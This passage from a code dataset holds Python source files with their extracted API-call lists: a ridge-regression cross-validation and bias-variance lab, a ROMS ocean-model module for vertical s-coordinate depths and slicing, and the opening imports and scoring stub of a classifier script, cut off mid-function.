code | apis | extract_api |
---|---|---|
stringlengths 31 to 1.05M | list | stringlengths 97 to 1.91M |
# Useful starting lines
# %matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
# %load_ext autoreload
# %autoreload 2
from sklearn import linear_model
# from __future__ import absolute_import
from labs.ex03.template import helpers
from labs.ex04.template.costs import compute_rmse, compute_mse
from labs.ex04.template.costs import compute_mse_for_ridge
from labs.ex04.template.ridge_regression import ridge_regression
from labs.ex04.template.build_polynomial import build_poly
from labs.ex04.template.plots import cross_validation_visualization
from labs.ex04.template.plots import cross_validation_visualization_for_degree
from labs.ex04.template.least_squares import least_squares
from labs.ex04.template.split_data import split_data
from labs.ex04.template.plots import bias_variance_decomposition_visualization
# load dataset
def data_load():
''' Return x, y '''
return helpers.load_data()
def build_k_indices(y, k_fold, seed):
"""build k indices for k-fold."""
num_row = y.shape[0]
interval = int(num_row / k_fold)
np.random.seed(seed)
indices = np.random.permutation(num_row)
k_indices = [indices[k * interval: (k + 1) * interval]
for k in range(k_fold)]
return np.array(k_indices)
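# A minimal usage sketch (hypothetical toy data, not part of the original lab code):
# each row of the returned array holds the sample indices of one fold.
def _demo_build_k_indices():
    toy_y = np.arange(12.0)                       # 12 hypothetical targets
    k_ind = build_k_indices(toy_y, k_fold=4, seed=1)
    assert k_ind.shape == (4, 3)                  # 4 folds of 12 // 4 = 3 samples each
    return k_ind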
def cross_validation(y, x, k_indices, k, lamb, degree, rmse=False):
"""return the loss of ridge regression."""
# ***************************************************
# Split data into K groups according to indices
# get k'th subgroup in test, others in train:
# ***************************************************
x = np.array(x)
y = np.array(y)
train_ind = np.concatenate((k_indices[:k], k_indices[k+1:]), axis=0)
train_ind = np.reshape(train_ind, (train_ind.size,))
test_ind = k_indices[k]
    # Note: indexing with a 1-D index array (x[indices,]) selects whole rows; for a
    # 2-D array it is equivalent to x[indices, :], and for a 1-D array to x[indices].
train_x = x[train_ind,]
train_y = y[train_ind,]
test_x = x[test_ind,]
test_y = y[test_ind,]
    # ***************************************************
    # form data with polynomial degree:
    # ***************************************************
train_x = build_poly(train_x, degree)
test_x = build_poly(test_x, degree)
    # ***************************************************
    # ridge regression:
    # ***************************************************
loss_tr, weight = ridge_regression(train_y, train_x, lamb)
    # Cross-check against sklearn's ridge solver (the result is currently unused).
    clf = linear_model.ridge_regression(train_x, train_y, alpha=lamb)
    # weight = clf
    # ***************************************************
    # calculate the loss for train and test data:
    # ***************************************************
    # Compute the (ridge-regularized) MSE with the learned weights
loss_tr = compute_mse_for_ridge(train_y, train_x, weight,lamb)
loss_te = compute_mse_for_ridge(test_y, test_x, weight, lamb)
# loss_tr = compute_mse(train_y, train_x, weight)
# loss_te = compute_mse(test_y, test_x, weight)
    if rmse:
loss_tr = compute_rmse(loss_tr)
loss_te = compute_rmse(loss_te)
return loss_tr, loss_te
def cross_validation_demo():
seed = 1
degree = 7
k_fold = 4
lambdas = np.logspace(-4, 2, 30)
y,x = data_load()
# split data in k fold
k_indices = build_k_indices(y, k_fold, seed)
# define lists to store the loss of training data and test data
mse_tr = []
mse_te = []
    # ***************************************************
    # cross validation:
    # ***************************************************
for lamb in lambdas:
_mse_tr = []
_mse_te = []
for k in range(k_fold):
loss_tr, loss_te = cross_validation(y,x,k_indices,k,lamb,degree, rmse=True)
_mse_tr += [loss_tr]
_mse_te += [loss_te]
avg_tr = np.average(_mse_tr)
avg_te = np.average(_mse_te)
mse_tr += [avg_tr]
mse_te += [avg_te]
cross_validation_visualization(lambdas, mse_tr, mse_te)
print(mse_tr, mse_te)
def cross_validation_demo_degree():
seed = 1
degrees = range(2,11)
k_fold = 4
lamb = 0.5
y,x = data_load()
# split data in k fold
k_indices = build_k_indices(y, k_fold, seed)
# define lists to store the loss of training data and test data
mse_tr = []
mse_te = []
    # ***************************************************
    # cross validation:
    # ***************************************************
for degree in degrees:
_mse_tr = []
_mse_te = []
for k in range(k_fold):
loss_tr, loss_te = cross_validation(y,x,k_indices,k,lamb, degree, rmse=True)
_mse_tr += [loss_tr]
_mse_te += [loss_te]
avg_tr = np.average(_mse_tr)
avg_te = np.average(_mse_te)
mse_tr += [avg_tr]
mse_te += [avg_te]
cross_validation_visualization_for_degree(degrees, mse_tr, mse_te)
print(mse_tr, mse_te)
def bias_variance2(y, x, weight, variance_e):
    '''
    Bias-variance error estimate for a linear model; the model dimension is len(weight).
    :param y: target values
    :param x: design matrix (polynomial features)
    :param weight: beta of the linear model
    :param variance_e: assumed noise variance
    :return: RMSE-style estimate of the expected test error
    '''
# N = len(x)
# res = np.dot(x, weight)
# error = variance_e * (len(weight) / N) + np.sum( (y - np.dot(x, weight)) **2 )/ N
# return compute_rmse(error)
return compute_rmse(compute_mse(y,x,weight) + 1 + len(weight)/ len(x))
def bias_variance(function, x, weight, variance_e):
    '''
    Bias-variance error estimate for a linear model; the model dimension is len(weight).
    :param function: true underlying function, evaluated on the first feature column of x
    :param x: design matrix (polynomial features)
    :param weight: beta of the linear model
    :param variance_e: assumed noise variance
    :return: RMSE of the model predictions against the noise-free function values
    '''
y = function(x[:,1])
# N = len(x)
# res = np.dot(x, weight)
# error = variance_e * (len(weight) / N) + np.sum( (y - np.dot(x, weight)) **2 )/ N
# return compute_rmse(error)
return compute_rmse(compute_mse(y,x,weight))
def bias_variance_demo():
"""The entry."""
# define parameters
seeds = range(100)
num_data = 10000
ratio_train = 0.005
degrees = range(1, 10)
# define list to store the variable
rmse_tr = np.empty((len(seeds), len(degrees)))
rmse_te = np.empty((len(seeds), len(degrees)))
for index_seed, seed in enumerate(seeds):
np.random.seed(seed)
x = np.linspace(0.1, 2 * np.pi, num_data)
y = np.sin(x) + 0.3 * np.random.randn(num_data).T
        # ***************************************************
        # split data with a specific seed:
        # ***************************************************
train_x, train_y, test_x, test_y = split_data(x,y,ratio_train,seed)
        # ***************************************************
        # bias_variance_decomposition:
        # ***************************************************
for ind_degree, degree in enumerate(degrees):
            # Use least squares
x_tr = build_poly(train_x, degree)
x_te = build_poly(test_x, degree)
mse, weight = least_squares(train_y, x_tr)
rmse_tr[index_seed][ind_degree] = bias_variance(np.sin, x_tr, weight, 1)
rmse_te[index_seed][ind_degree] = bias_variance(np.sin, x_te, weight, 1)
# rmse_tr[index_seed][ind_degree] = bias_variance2(train_y, x_tr, weight, 1)
# rmse_te[index_seed][ind_degree] = bias_variance2(test_y, x_te, weight, 1)
bias_variance_decomposition_visualization(degrees, rmse_tr, rmse_te)
# cross_validation_demo()
# degree = 5.
# cross_validation_demo_degree()
bias_variance_demo()
print()
|
[
"numpy.random.seed",
"numpy.logspace",
"labs.ex04.template.plots.cross_validation_visualization_for_degree",
"labs.ex04.template.costs.compute_mse_for_ridge",
"numpy.sin",
"labs.ex04.template.plots.bias_variance_decomposition_visualization",
"labs.ex04.template.ridge_regression.ridge_regression",
"labs.ex04.template.split_data.split_data",
"numpy.random.randn",
"numpy.reshape",
"numpy.linspace",
"numpy.average",
"labs.ex04.template.plots.cross_validation_visualization",
"labs.ex04.template.build_polynomial.build_poly",
"labs.ex03.template.helpers.load_data",
"numpy.random.permutation",
"labs.ex04.template.costs.compute_rmse",
"numpy.concatenate",
"labs.ex04.template.least_squares.least_squares",
"labs.ex04.template.costs.compute_mse",
"numpy.array",
"sklearn.linear_model.ridge_regression"
] |
[((904, 923), 'labs.ex03.template.helpers.load_data', 'helpers.load_data', ([], {}), '()\n', (921, 923), False, 'from labs.ex03.template import helpers\n'), ((1067, 1087), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1081, 1087), True, 'import numpy as np\n'), ((1102, 1132), 'numpy.random.permutation', 'np.random.permutation', (['num_row'], {}), '(num_row)\n', (1123, 1132), True, 'import numpy as np\n'), ((1244, 1263), 'numpy.array', 'np.array', (['k_indices'], {}), '(k_indices)\n', (1252, 1263), True, 'import numpy as np\n'), ((1606, 1617), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (1614, 1617), True, 'import numpy as np\n'), ((1626, 1637), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (1634, 1637), True, 'import numpy as np\n'), ((1655, 1713), 'numpy.concatenate', 'np.concatenate', (['(k_indices[:k], k_indices[k + 1:])'], {'axis': '(0)'}), '((k_indices[:k], k_indices[k + 1:]), axis=0)\n', (1669, 1713), True, 'import numpy as np\n'), ((1728, 1768), 'numpy.reshape', 'np.reshape', (['train_ind', '(train_ind.size,)'], {}), '(train_ind, (train_ind.size,))\n', (1738, 1768), True, 'import numpy as np\n'), ((2197, 2224), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['train_x', 'degree'], {}), '(train_x, degree)\n', (2207, 2224), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((2238, 2264), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['test_x', 'degree'], {}), '(test_x, degree)\n', (2248, 2264), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((2456, 2496), 'labs.ex04.template.ridge_regression.ridge_regression', 'ridge_regression', (['train_y', 'train_x', 'lamb'], {}), '(train_y, train_x, lamb)\n', (2472, 2496), False, 'from labs.ex04.template.ridge_regression import ridge_regression\n'), ((2545, 2604), 'sklearn.linear_model.ridge_regression', 'linear_model.ridge_regression', (['train_x', 'train_y'], {'alpha': 'lamb'}), '(train_x, train_y, alpha=lamb)\n', (2574, 2604), False, 'from sklearn import linear_model\n'), ((2879, 2932), 'labs.ex04.template.costs.compute_mse_for_ridge', 'compute_mse_for_ridge', (['train_y', 'train_x', 'weight', 'lamb'], {}), '(train_y, train_x, weight, lamb)\n', (2900, 2932), False, 'from labs.ex04.template.costs import compute_mse_for_ridge\n'), ((2946, 2997), 'labs.ex04.template.costs.compute_mse_for_ridge', 'compute_mse_for_ridge', (['test_y', 'test_x', 'weight', 'lamb'], {}), '(test_y, test_x, weight, lamb)\n', (2967, 2997), False, 'from labs.ex04.template.costs import compute_mse_for_ridge\n'), ((3321, 3343), 'numpy.logspace', 'np.logspace', (['(-4)', '(2)', '(30)'], {}), '(-4, 2, 30)\n', (3332, 3343), True, 'import numpy as np\n'), ((4096, 4151), 'labs.ex04.template.plots.cross_validation_visualization', 'cross_validation_visualization', (['lambdas', 'mse_tr', 'mse_te'], {}), '(lambdas, mse_tr, mse_te)\n', (4126, 4151), False, 'from labs.ex04.template.plots import cross_validation_visualization\n'), ((5039, 5105), 'labs.ex04.template.plots.cross_validation_visualization_for_degree', 'cross_validation_visualization_for_degree', (['degrees', 'mse_tr', 'mse_te'], {}), '(degrees, mse_tr, mse_te)\n', (5080, 5105), False, 'from labs.ex04.template.plots import cross_validation_visualization_for_degree\n'), ((7713, 7781), 'labs.ex04.template.plots.bias_variance_decomposition_visualization', 'bias_variance_decomposition_visualization', (['degrees', 'rmse_tr', 'rmse_te'], {}), '(degrees, rmse_tr, rmse_te)\n', (7754, 7781), False, 'from 
labs.ex04.template.plots import bias_variance_decomposition_visualization\n'), ((3144, 3165), 'labs.ex04.template.costs.compute_rmse', 'compute_rmse', (['loss_tr'], {}), '(loss_tr)\n', (3156, 3165), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((3184, 3205), 'labs.ex04.template.costs.compute_rmse', 'compute_rmse', (['loss_te'], {}), '(loss_te)\n', (3196, 3205), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((3980, 3999), 'numpy.average', 'np.average', (['_mse_tr'], {}), '(_mse_tr)\n', (3990, 3999), True, 'import numpy as np\n'), ((4017, 4036), 'numpy.average', 'np.average', (['_mse_te'], {}), '(_mse_te)\n', (4027, 4036), True, 'import numpy as np\n'), ((4923, 4942), 'numpy.average', 'np.average', (['_mse_tr'], {}), '(_mse_tr)\n', (4933, 4942), True, 'import numpy as np\n'), ((4960, 4979), 'numpy.average', 'np.average', (['_mse_te'], {}), '(_mse_te)\n', (4970, 4979), True, 'import numpy as np\n'), ((6129, 6154), 'labs.ex04.template.costs.compute_mse', 'compute_mse', (['y', 'x', 'weight'], {}), '(y, x, weight)\n', (6140, 6154), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((6519, 6539), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (6533, 6539), True, 'import numpy as np\n'), ((6552, 6589), 'numpy.linspace', 'np.linspace', (['(0.1)', '(2 * np.pi)', 'num_data'], {}), '(0.1, 2 * np.pi, num_data)\n', (6563, 6589), True, 'import numpy as np\n'), ((6895, 6930), 'labs.ex04.template.split_data.split_data', 'split_data', (['x', 'y', 'ratio_train', 'seed'], {}), '(x, y, ratio_train, seed)\n', (6905, 6930), False, 'from labs.ex04.template.split_data import split_data\n'), ((6602, 6611), 'numpy.sin', 'np.sin', (['x'], {}), '(x)\n', (6608, 6611), True, 'import numpy as np\n'), ((7232, 7259), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['train_x', 'degree'], {}), '(train_x, degree)\n', (7242, 7259), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((7279, 7305), 'labs.ex04.template.build_polynomial.build_poly', 'build_poly', (['test_x', 'degree'], {}), '(test_x, degree)\n', (7289, 7305), False, 'from labs.ex04.template.build_polynomial import build_poly\n'), ((7332, 7360), 'labs.ex04.template.least_squares.least_squares', 'least_squares', (['train_y', 'x_tr'], {}), '(train_y, x_tr)\n', (7345, 7360), False, 'from labs.ex04.template.least_squares import least_squares\n'), ((5589, 5614), 'labs.ex04.template.costs.compute_mse', 'compute_mse', (['y', 'x', 'weight'], {}), '(y, x, weight)\n', (5600, 5614), False, 'from labs.ex04.template.costs import compute_rmse, compute_mse\n'), ((6620, 6645), 'numpy.random.randn', 'np.random.randn', (['num_data'], {}), '(num_data)\n', (6635, 6645), True, 'import numpy as np\n')]
|
"""Vertical structure functions for ROMS
:func:`sdepth`
Depth of s-levels
:func:`zslice`
Slice a 3D field in s-coordinates to fixed depth
:func:`multi_zslice`
Slice a 3D field to several depth levels
:func:`z_average`
Vertical average of a 3D field
:func:`s_stretch`
Compute vertical stretching arrays Cs_r or Cs_w
"""
# -----------------------------------
# <NAME> <<EMAIL>>
# Institute of Marine Research
# Bergen, Norway
# 2010-09-30
# -----------------------------------
from typing import Union, List
import numpy as np
import xarray as xr
Surface = Union[float, np.ndarray] # Surface z = ....
def sdepth(H, Hc, C, stagger="rho", Vtransform=1):
"""Depth of s-levels
*H* : arraylike
Bottom depths [meter, positive]
*Hc* : scalar
Critical depth
    *C* : 1D array
    s-level stretching curve
    *stagger* : [ 'rho' | 'w' ]
    *Vtransform* : [ 1 | 2 ]
    defines the transform used, default 1 = Song and Haidvogel
    Returns an array with ndim = H.ndim + 1 and
    shape = C.shape + H.shape, holding the depths of the
    mid-points of the s-levels.
Typical usage::
>>> fid = Dataset(roms_file)
>>> H = fid.variables['h'][:, :]
>>> C = fid.variables['Cs_r'][:]
>>> Hc = fid.variables['hc'].getValue()
>>> z_rho = sdepth(H, Hc, C)
"""
H = np.asarray(H)
Hshape = H.shape # Save the shape of H
    H = H.ravel()  # and make H 1D for easy shape manipulation
C = np.asarray(C)
N = len(C)
outshape = (N,) + Hshape # Shape of output
if stagger == "rho":
S = -1.0 + (0.5 + np.arange(N)) / N # Unstretched coordinates
elif stagger == "w":
S = np.linspace(-1.0, 0.0, N)
else:
raise ValueError("stagger must be 'rho' or 'w'")
if Vtransform == 1: # Default transform by Song and Haidvogel
A = Hc * (S - C)[:, None]
B = np.outer(C, H)
return (A + B).reshape(outshape)
    elif Vtransform == 2:  # New transform by Shchepetkin
        Zo = Hc * S[:, None] + np.outer(C, H)
        D = 1.0 + Hc / H
        return (Zo / D).reshape(outshape)
else:
raise ValueError("Unknown Vtransform")
# ------------------------------------
def sdepth_w(H, Hc, cs_w):
"""Return depth of w-points in s-levels
Kept for backwards compatibility
use *sdepth(H, Hc, cs_w, stagger='w')* instead
"""
return sdepth(H, Hc, cs_w, stagger="w")
# ------------------------------------------
# Vertical slicing e.t.c.
# ------------------------------------------
def zslice2(F, S, z):
"""Vertical slice of a 3D ROMS field
Vertical interpolation of a field in s-coordinates to
(possibly varying) depth level
*F* : array with vertical profiles, first dimension is vertical
*S* : array with depths of the F-values,
*z* : Depth level(s) for output, scalar or ``shape = F.shape[1:]``
The z values should be negative
Return value : array, `shape = F.shape[1:]`, the vertical slice
Example:
H is an array of depths (positive values)
Hc is the critical depth
C is 1D containing the s-coordinate stretching at rho-points
returns F50, interpolated values at 50 meter with F50.shape = H.shape
>>> z_rho = sdepth(H, Hc, C)
    >>> F50 = zslice2(F, z_rho, -50.0)
"""
# TODO:
# Option to Save A, D, Dm
# => faster interpolate more fields to same depth
F = np.asarray(F)
S = np.asarray(S)
z = np.asarray(z, dtype="float")
Fshape = F.shape # Save original shape
if S.shape != Fshape:
raise ValueError("F and z_r must have same shape")
if z.shape and z.shape != Fshape[1:]:
raise ValueError("z must be scalar or have shape = F.shape[1:]")
# Flatten all non-vertical dimensions
N = F.shape[0] # Length of vertical dimension
M = F.size // N # Combined length of horizontal dimension(s)
F = F.reshape((N, M))
S = S.reshape((N, M))
if z.shape:
z = z.reshape((M,))
# Find integer array C with shape (M,)
# with S[C[i]-1, i] < z <= S[C[i], i]
# C = np.apply_along_axis(np.searchsorted, 0, S, z)
# but the following is much faster
C = np.sum(S < z, axis=0)
C = C.clip(1, N - 1)
# For vectorization
# construct index array tuples D and Dm such that
# F[D][i] = F[C[i], i]
# F[Dm][i] = F[C[i]-1, i]
I = np.arange(M, dtype="int")
D = (C, I)
Dm = (C - 1, I)
# Compute interpolation weights
A = (z - S[Dm]) / (S[D] - S[Dm])
A = A.clip(0.0, 1.0) # Control the extrapolation
# Do the linear interpolation
R = (1 - A) * F[Dm] + A * F[D]
    # Give the result the correct shape
R = R.reshape(Fshape[1:])
return R
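# A minimal sketch (synthetic field, hypothetical values) of zslice2: interpolate a
# three-level field to a fixed depth of -50 m over two water columns.
def _example_zslice2():
    S = np.array([[-90.0, -45.0], [-60.0, -30.0], [-30.0, -15.0]])  # depths of the F-values
    F = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])           # field values
    F50 = zslice2(F, S, -50.0)                # shape == F.shape[1:] == (2,)
    return F50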
# -----------------------------------------------
def s_stretch(N, theta_s, theta_b, stagger="rho", Vstretching=1):
"""Compute a s-level stretching array
*N* : Number of vertical levels
*theta_s* : Surface stretching factor
*theta_b* : Bottom stretching factor
*stagger* : "rho"|"w"
    *Vstretching* : 1|2|4|5
"""
if stagger == "rho":
S = -1.0 + (0.5 + np.arange(N)) / N
elif stagger == "w":
S = np.linspace(-1.0, 0.0, N + 1)
else:
raise ValueError("stagger must be 'rho' or 'w'")
if Vstretching == 1:
cff1 = 1.0 / np.sinh(theta_s)
cff2 = 0.5 / np.tanh(0.5 * theta_s)
return (1.0 - theta_b) * cff1 * np.sinh(theta_s * S) + theta_b * (
cff2 * np.tanh(theta_s * (S + 0.5)) - 0.5
)
elif Vstretching == 2:
a, b = 1.0, 1.0
Csur = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
Cbot = np.sinh(theta_b * (S + 1)) / np.sinh(theta_b) - 1
mu = (S + 1) ** a * (1 + (a / b) * (1 - (S + 1) ** b))
return mu * Csur + (1 - mu) * Cbot
elif Vstretching == 4:
C = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
C = (np.exp(theta_b * C) - 1) / (1 - np.exp(-theta_b))
return C
elif Vstretching == 5:
if stagger == "w":
K = np.arange(N + 1)
if stagger == "rho":
K = np.arange(0.5, N + 1)
S1 = -(K * K - 2 * K * N + K + N * N - N) / (N * N - N)
S2 = -0.01 * (K * K - K * N) / (1 - N)
S = S1 + S2
C = (1 - np.cosh(theta_s * S)) / (np.cosh(theta_s) - 1)
        C = (np.exp(theta_b * C) - 1) / (1 - np.exp(-theta_b))
        return C
else:
raise ValueError("Unknown Vstretching")
def invert_s(F: xr.DataArray, value: Surface):
"""Return highest (shallowest) s-value such that F(s,...) = value
F = DataArray with z_rho as coordinate
The vertical dimension in F must be first, axis=0
F must not have a time dimension
Returns D, Dm, a
F[Dm] <= value <= F[D] (or opposite inequalities)
and a is the interpolation weight:
value = (1-a)*F(K-1) + a*F(K)
a = nan if this is not possible
"""
val = value
# Work on numpy arrays
F0 = F.values
# z_rho = F.z_rho.values
# s_rho = F.s_rho.values
val = np.asarray(val, dtype="float")
# Fshape = F.shape # Save original shape
# if val.shape and val.shape != Fshape[1:]:
# raise ValueError("z must be scalar or have shape = F.shape[1:]")
# Flatten all non-vertical dimensions
N = F.shape[0] # Length of vertical dimension
M = F0.size // N # Combined length of horizontal dimensions
F0 = F0.reshape((N, M))
if val.shape: # Value may be space dependent
val = val.reshape((M,))
# Look for highest s-value where G is negative
G = (F0[1:, :] - val) * (F0[:-1, :] - val)
G = G[::-1, :] # Reverse
K = N - 1 - (G <= 0).argmax(axis=0)
# Define D such that F[D][i] = F[K[i], i]
I = np.arange(M)
D = (K, I)
Dm = (K - 1, I)
# Compute interpolation weights
a = (val - F0[Dm]) / (F0[D] - F0[Dm] + 1e-30)
# Only use 0 <= a <= 1
    a[np.abs(a - 0.5) > 0.5] = np.nan  # values outside [0, 1] mean no crossing was found
return D, Dm, a
class HorizontalSlicer:
"""Reduce to horizontal view by slicing
F = DataArray, time-independent, first dimension is vertical
value = slice value
If F is not monotonous, returns the shallowest depth where F = value
"""
def __init__(self, F: xr.DataArray, value: Surface) -> None:
self.D, self.Dm, self.a = invert_s(F, value)
self.M = len(self.a)
# self.dims = F.dims
def __call__(self, G: xr.DataArray) -> xr.DataArray:
"""G must have same vertical and horizontal dimensions as F"""
if "ocean_time" in G.dims:
ntimes = G.shape[0]
kmax = G.shape[1]
R: List[np.ndarray] = []
for t in range(ntimes):
G0 = G.isel(ocean_time=t).values
G0 = G0.reshape((kmax, self.M))
R0 = (1 - self.a) * G0[self.Dm] + self.a * G0[self.D]
R0 = R0.reshape(G.shape[2:])
R.append(R0)
R1 = np.array(R)
else:
kmax = G.shape[0]
G0 = G.values
G0 = G0.reshape((kmax, self.M))
R1 = (1 - self.a) * G0[self.Dm] + self.a * G0[self.D]
R1 = R1.reshape(G.shape[1:])
# Return a DataArray
# Should have something on z_rho?
dims = list(G.dims)
dims.remove("s_rho")
coords = {dim: G.coords[dim] for dim in dims}
coords["lon_rho"] = G.coords["lon_rho"]
coords["lat_rho"] = G.coords["lat_rho"]
return xr.DataArray(R1, dims=dims, coords=coords, attrs=G.attrs)
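# A minimal, self-contained usage sketch of HorizontalSlicer on synthetic DataArrays
# (hypothetical sizes and coordinate values): slice a field G to the depth where
# z_rho equals -50 m.
def _example_horizontal_slicer():
    z_vals = np.linspace(-100.0, -2.5, 20)[:, None, None] * np.ones((20, 4, 5))
    coords2d = {
        "eta_rho": np.arange(4),
        "xi_rho": np.arange(5),
        "lon_rho": (("eta_rho", "xi_rho"), np.random.rand(4, 5)),
        "lat_rho": (("eta_rho", "xi_rho"), np.random.rand(4, 5)),
    }
    z_rho = xr.DataArray(z_vals, dims=("s_rho", "eta_rho", "xi_rho"))
    G = xr.DataArray(np.random.rand(20, 4, 5),
                     dims=("s_rho", "eta_rho", "xi_rho"), coords=coords2d)
    slicer = HorizontalSlicer(z_rho, -50.0)
    return slicer(G)                          # DataArray with dims ("eta_rho", "xi_rho")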
|
[
"numpy.outer",
"numpy.sum",
"numpy.tanh",
"numpy.abs",
"numpy.asarray",
"numpy.arange",
"xarray.DataArray",
"numpy.linspace",
"numpy.array",
"numpy.cosh",
"numpy.exp",
"numpy.sinh"
] |
[((1334, 1347), 'numpy.asarray', 'np.asarray', (['H'], {}), '(H)\n', (1344, 1347), True, 'import numpy as np\n'), ((1462, 1475), 'numpy.asarray', 'np.asarray', (['C'], {}), '(C)\n', (1472, 1475), True, 'import numpy as np\n'), ((3411, 3424), 'numpy.asarray', 'np.asarray', (['F'], {}), '(F)\n', (3421, 3424), True, 'import numpy as np\n'), ((3433, 3446), 'numpy.asarray', 'np.asarray', (['S'], {}), '(S)\n', (3443, 3446), True, 'import numpy as np\n'), ((3455, 3483), 'numpy.asarray', 'np.asarray', (['z'], {'dtype': '"""float"""'}), "(z, dtype='float')\n", (3465, 3483), True, 'import numpy as np\n'), ((4173, 4194), 'numpy.sum', 'np.sum', (['(S < z)'], {'axis': '(0)'}), '(S < z, axis=0)\n', (4179, 4194), True, 'import numpy as np\n'), ((4369, 4394), 'numpy.arange', 'np.arange', (['M'], {'dtype': '"""int"""'}), "(M, dtype='int')\n", (4378, 4394), True, 'import numpy as np\n'), ((7020, 7050), 'numpy.asarray', 'np.asarray', (['val'], {'dtype': '"""float"""'}), "(val, dtype='float')\n", (7030, 7050), True, 'import numpy as np\n'), ((7713, 7725), 'numpy.arange', 'np.arange', (['M'], {}), '(M)\n', (7722, 7725), True, 'import numpy as np\n'), ((1879, 1893), 'numpy.outer', 'np.outer', (['C', 'H'], {}), '(C, H)\n', (1887, 1893), True, 'import numpy as np\n'), ((9444, 9501), 'xarray.DataArray', 'xr.DataArray', (['R1'], {'dims': 'dims', 'coords': 'coords', 'attrs': 'G.attrs'}), '(R1, dims=dims, coords=coords, attrs=G.attrs)\n', (9456, 9501), True, 'import xarray as xr\n'), ((1672, 1697), 'numpy.linspace', 'np.linspace', (['(-1.0)', '(0.0)', 'N'], {}), '(-1.0, 0.0, N)\n', (1683, 1697), True, 'import numpy as np\n'), ((5163, 5192), 'numpy.linspace', 'np.linspace', (['(-1.0)', '(0.0)', '(N + 1)'], {}), '(-1.0, 0.0, N + 1)\n', (5174, 5192), True, 'import numpy as np\n'), ((5307, 5323), 'numpy.sinh', 'np.sinh', (['theta_s'], {}), '(theta_s)\n', (5314, 5323), True, 'import numpy as np\n'), ((5345, 5367), 'numpy.tanh', 'np.tanh', (['(0.5 * theta_s)'], {}), '(0.5 * theta_s)\n', (5352, 5367), True, 'import numpy as np\n'), ((7881, 7896), 'numpy.abs', 'np.abs', (['(a - 0.5)'], {}), '(a - 0.5)\n', (7887, 7896), True, 'import numpy as np\n'), ((8916, 8927), 'numpy.array', 'np.array', (['R'], {}), '(R)\n', (8924, 8927), True, 'import numpy as np\n'), ((2024, 2038), 'numpy.outer', 'np.outer', (['C', 'H'], {}), '(C, H)\n', (2032, 2038), True, 'import numpy as np\n'), ((5408, 5428), 'numpy.sinh', 'np.sinh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5415, 5428), True, 'import numpy as np\n'), ((1590, 1602), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (1599, 1602), True, 'import numpy as np\n'), ((5108, 5120), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (5117, 5120), True, 'import numpy as np\n'), ((5579, 5599), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5586, 5599), True, 'import numpy as np\n'), ((5604, 5620), 'numpy.cosh', 'np.cosh', (['theta_s'], {}), '(theta_s)\n', (5611, 5620), True, 'import numpy as np\n'), ((5641, 5667), 'numpy.sinh', 'np.sinh', (['(theta_b * (S + 1))'], {}), '(theta_b * (S + 1))\n', (5648, 5667), True, 'import numpy as np\n'), ((5670, 5686), 'numpy.sinh', 'np.sinh', (['theta_b'], {}), '(theta_b)\n', (5677, 5686), True, 'import numpy as np\n'), ((5462, 5490), 'numpy.tanh', 'np.tanh', (['(theta_s * (S + 0.5))'], {}), '(theta_s * (S + 0.5))\n', (5469, 5490), True, 'import numpy as np\n'), ((5842, 5862), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (5849, 5862), True, 'import numpy as np\n'), ((5867, 5883), 'numpy.cosh', 'np.cosh', 
(['theta_s'], {}), '(theta_s)\n', (5874, 5883), True, 'import numpy as np\n'), ((5902, 5921), 'numpy.exp', 'np.exp', (['(theta_b * C)'], {}), '(theta_b * C)\n', (5908, 5921), True, 'import numpy as np\n'), ((5934, 5950), 'numpy.exp', 'np.exp', (['(-theta_b)'], {}), '(-theta_b)\n', (5940, 5950), True, 'import numpy as np\n'), ((6040, 6056), 'numpy.arange', 'np.arange', (['(N + 1)'], {}), '(N + 1)\n', (6049, 6056), True, 'import numpy as np\n'), ((6102, 6123), 'numpy.arange', 'np.arange', (['(0.5)', '(N + 1)'], {}), '(0.5, N + 1)\n', (6111, 6123), True, 'import numpy as np\n'), ((6272, 6292), 'numpy.cosh', 'np.cosh', (['(theta_s * S)'], {}), '(theta_s * S)\n', (6279, 6292), True, 'import numpy as np\n'), ((6297, 6313), 'numpy.cosh', 'np.cosh', (['theta_s'], {}), '(theta_s)\n', (6304, 6313), True, 'import numpy as np\n'), ((6332, 6351), 'numpy.exp', 'np.exp', (['(theta_b * C)'], {}), '(theta_b * C)\n', (6338, 6351), True, 'import numpy as np\n'), ((6364, 6380), 'numpy.exp', 'np.exp', (['(-theta_b)'], {}), '(-theta_b)\n', (6370, 6380), True, 'import numpy as np\n')]
|
import numpy as np
import sys
# for calculating the loss
from sklearn.metrics import log_loss
from sklearn.metrics import make_scorer
# machine learning model and model-selection utilities
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedShuffleSplit
# for scaling the data
from sklearn import preprocessing
from sklearn.model_selection import GridSearchCV
import os
from os import mkdir, listdir
from os.path import join, isdir, dirname
from time import strftime
import constants as ct
import configparser
import argparse
import logging
import random
import pandas
import pickle
import joblib
logger = logging.getLogger('cumul')
random.seed(1123)
np.random.seed(1123)
'''params'''
r = 10
def score_func(ground_truths, predictions):
global MON_SITE_NUM, tps, wps, fps, ps, ns, flag
tp, wp, fp, p, n = 0, 0, 0, 0 ,0
for truth,prediction in zip(ground_truths, predictions):
if truth != MON_SITE_NUM:
p += 1
else:
n += 1
if prediction != MON_SITE_NUM:
